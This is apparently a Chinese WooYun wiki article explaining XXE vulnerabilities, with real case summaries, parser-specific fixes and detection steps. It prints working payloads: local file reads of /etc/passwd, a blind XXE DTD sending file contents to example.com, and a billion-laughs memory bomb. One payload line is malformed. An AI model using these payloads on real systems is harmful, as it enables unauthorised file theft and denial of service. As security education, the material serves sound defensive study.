XML External Entity attack/XXE攻击
1、相关背景介绍
可扩展标记语言(eXtensible Markup Language,XML)是一种标记语言,被设计用来传输和存储数据。XML应用极其广泛,如:
* 普通列表项目文档格式:OOXML,ODF,PDF,RSS…… * 图片格式:SVG,EXIF Headers…… * 网络协议:WebDAV,CalDAV,XMLRPC,SOAP,REST,XMPP,SAML,XACML…… * 配置文件:Spring配置文件,Struts2配置文件……
在XML 1.0标准中定义了实体的概念,实体是用于定义引用普通文本或特殊字符的快捷方式的变量,实体可在内部或外部进行声明。
包含内部实体的XML文档:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE entity [
<!ENTITY copyright "Copyright wiki.wooyun.org">
]>
<wooyun>
<internal>©right;</internal>
</wooyun>
包含外部实体的XML文档:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE entity [
<!ENTITY wiki SYSTEM "http://wiki.wooyun.org/">
]>
<wooyun>
<external>&wiki;</external>
</wooyun>
在解析XML时,实体将会被替换成相应的引用内容。
XML外部实体(XML External Entity,XXE)攻击是一种常见的Web安全漏洞,攻击者可以通过XML的外部实体获取服务器中本应被保护的数据。
2、成因
XML解析器解析外部实体时支持多种协议:
| libxml2 | PHP | Java | .NET |
| ——– | —————- | ——– | ——– |
| file | file | file | file |
| http | http | http | http |
| ftp | ftp | ftp | ftp |
| php | https | https | |
| compress.zlib | jar | ||
| data | netdoc | ||
| glob | mailto | ||
| phar | gopher |
如使用file协议可以读取本地文件内容、使用http协议可以获取Web资源等,因此攻击者可构造恶意的外部实体,当解析器解析了包含“恶意”外部实体的XML类型文件时,便会导致被XXE攻击。
下面这个XML被解析时便会将本地/etc/passwd文件的内容读出来:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE entity [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<wooyun>
<external>&file;</external>
</wooyun>
注:如果读取的文件本身包含“<”、“&”等字符时会产生失败的情况,对于此类文件可以使用Base64编码绕过,具体方法如下:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE entity [
<!ENTITY file SYSTEM ENTITY e SYSTEM "php://filter/read=convert.base64-encode/resource=http://wiki.wooyun.org">
]>
<wooyun>
<external>&file;</external>
</wooyun>
不同的解析器可能默认对于外部实体会有不同的处理规则,以PHP语言为例,xml_parse的实现方式为expat库,而simplexml_load使用的是libxml库,两个底层库在解析的时候细节并不一样,expat默认对外部实体并不解析,而simplexml_load默认情况下会解析外部实体等,所以simplexml_load函数会受此问题影响,而xml_parse则默认不会受到影响。下面是几种常见语言可能会受到此问题影响的解析XML的方法:
| PHP | Java | .NET |
| ———— | —————- | ———————— |
| DOM | (待补充) | System.Xml.XmlDocument |
| SimpleXML | System.Xml.XmlReader |
3、攻击方式及危害
XXE的攻击方式分为显式攻击和盲攻击两种:
上述POC即为显式攻击,攻击者通过正常的回显将外部实体里的内容读取出来。
但是,在有些情况下无法通过这种方式完成XXE攻击,这时我们可以采取盲攻击的办法。
XXE盲攻击利用参数实体将本地文件内容读出来后,作为URL中的参数向其指定服务器发起请求,然后在其指定服务器的日志(Apache日志)中读出文件的内容。
因在dtd中使用%来定义参数实体的方式只能在外部子集中使用,或由外部文件定义参数实体,引用到XML文件的dtd来使用,所以XML文件稍有不同:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE entity [
<!ENTITY % call SYSTEM "http://example.com/evil.xml">
%call;
]>
<wooyun>
<text>test</text>
</wooyun>
其中http://example.com/evil.xml里的内容是:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://example.com/?file=%file;'>">
%int;
%send;
危害:
XXE漏洞会导致读取任意未授权文件,如上述POC即可读取服务器中的/etc/passwd文件;
因为基于树的XML解析器会把全部加载到内存中,因此XXE漏洞也有可能被用来恶意消耗内存进行拒绝服务攻击,例如:
<?xml version = "1.0"?>
<!DOCTYPE entity [
<!ENTITY wooyun "wooyun">
<!ELEMENT wooyunz (#PCDATA)>
<!ENTITY wooyun1 "&wooyun;&wooyun;&wooyun;&wooyun;&wooyun;&wooyun;&wooyun;&wooyun;&wooyun;&wooyun;">
<!ENTITY wooyun2 "&wooyun1;&wooyun1;&wooyun1;&wooyun1;&wooyun1;&wooyun1;&wooyun1;&wooyun1;&wooyun1;&wooyun1;">
<!ENTITY wooyun3 "&wooyun2;&wooyun2;&wooyun2;&wooyun2;&wooyun2;&wooyun2;&wooyun2;&wooyun2;&wooyun2;&wooyun2;">
<!ENTITY wooyun4 "&wooyun3;&wooyun3;&wooyun3;&wooyun3;&wooyun3;&wooyun3;&wooyun3;&wooyun3;&wooyun3;&wooyun3;">
<!ENTITY wooyun5 "&wooyun4;&wooyun4;&wooyun4;&wooyun4;&wooyun4;&wooyun4;&wooyun4;&wooyun4;&wooyun4;&wooyun4;">
<!ENTITY wooyun6 "&wooyun5;&wooyun5;&wooyun5;&wooyun5;&wooyun5;&wooyun5;&wooyun5;&wooyun5;&wooyun5;&wooyun5;">
<!ENTITY wooyun7 "&wooyun6;&wooyun6;&wooyun6;&wooyun6;&wooyun6;&wooyun6;&wooyun6;&wooyun6;&wooyun6;&wooyun6;">
<!ENTITY wooyun8 "&wooyun7;&wooyun7;&wooyun7;&wooyun7;&wooyun7;&wooyun7;&wooyun7;&wooyun7;&wooyun7;&wooyun7;">
<!ENTITY wooyun9 "&wooyun8;&wooyun8;&wooyun8;&wooyun8;&wooyun8;&wooyun8;&wooyun8;&wooyun8;&wooyun8;&wooyun8;">
]>
<wooyun>&wooyun9;</wooyun>
这个XML在定义实体是不断嵌套调用,如解析时未对大小进行限制,则可能会导致内存大量被消耗,从而实现拒绝服务攻击。
此外,还可以利用支持的协议构造出很多相关的攻击,如探测内网信息(如检测服务等)等。
4、实际案例
gainover:WooYun-2014-59783:百度某功能XML实体注入(二)
由于SVG本身是基于XML的,该漏洞在SVG转成JPG图片时的XML解析过程中厂商仅直接过滤了ENTITY关键字,但是由于DTD本身就支持调用外部的DTD文件,因此通过调用<!DOCTYPE svg SYSTEM “http://example.com/xxe.dtd”>的方式引入外部的DTD文件即成功避开了对ENTITY关键字的过滤,其中xxe.dtd的内容如下:
<!ENTITY test SYSTEM "file:///etc/passwd">
iv4n:WooYun-2014-74069:鲜果网RSS导入Blind XXE漏洞
该漏洞的过程是利用参数实体实现了XXE盲攻击,在读取本地文件后,将读出本地文件的内容作为URL中的参数向其指定服务器发起请求,在指定服务器的Apache日志中即可看到读出的文件内容。
五道口杀气:WooYun-2014-59911:从开源中国的某XXE漏洞到主站shell
该漏洞在格式化xml时进行了解析且没有对外部实体进行限制,所以产生服务器上任意文件被读取的问题,从而导致主站的ssh用户名和密码泄露,被成功getshell。
5、修复方案
在默认情况下关闭内联DTD解析(Inline DTD parsing)、外部实体、实体,使用白名单来控制允许实用的协议。
了解所使用的XML解析器是否默认解析外部实体,如果默认解析应根据实际情况进行关闭或者限制。下面给出了一些常见的关闭方法:
PHP:
对于使用SimpleXML解析XML的方法可在加载实体之前添加libxmldisableentity_loader(true);语句以进制解析外部实体。
对于使用DOM解析XML的方法可在加载实体之前添加libxmldisableentity_loader(true);语句或者使用:
<?php
// with the DOM functionality:
$dom = new DOMDocument();
$dom->loadXML($badXml,LIBXML_DTDLOAD|LIBXML_DTDATTR);
?>
对于XMLReader解析XML的方法可使用:
<?php
// with the XMLReader functionality:
$doc = XMLReader::xml($badXml,'UTF-8',LIBXML_NONET);
?>
Java:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
.Net:
对于使用System.Xml.XmlReader解析XML的方法:
默认情况下,外部资源使用没有用户凭据的XmlUrlResolver对象进行解析。这意味着在默认情况下,可以访问任何不需要凭据的位置。通过执行下列操作之一,可以进一步保证安全:
-
通过将XmlReaderSettings.XmlResolver属性设置为XmlSecureResolver对象限制XmlReader可访问的资源。
-
通过将XmlReaderSettings.XmlResolver属性设置为null,不允许XmlReader打开任何外部资源。
对于利用超大的XML文档进行拒绝服务攻击的问题,使用XmlReader时,通过设置MaxCharactersInDocument属性,可以限制能够分析的文档大小。通过设置MaxCharactersFromEntities属性,可以限制从扩展实体中生成的字符数。
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
6、漏洞扫描与发现
检测XML是否被解析
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY xxe "xxe test">
]>
<root>&xxe;</root>
如果显示了xxe test证明支持,进行第二步
是否支持外部实体:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY % xxe SYSTEM "http://192.168.5.1/xxe.xml">
%xxe;
]>
观察自己的服务器上得access.log,如果有xxe.xml的请求,证明可以加载外部实体。
然后判断是否有回显,有回显就直接加载外部实体来进行攻击
不能回显,则使用Blind XXE攻击方法
7、相关其他安全问题
未知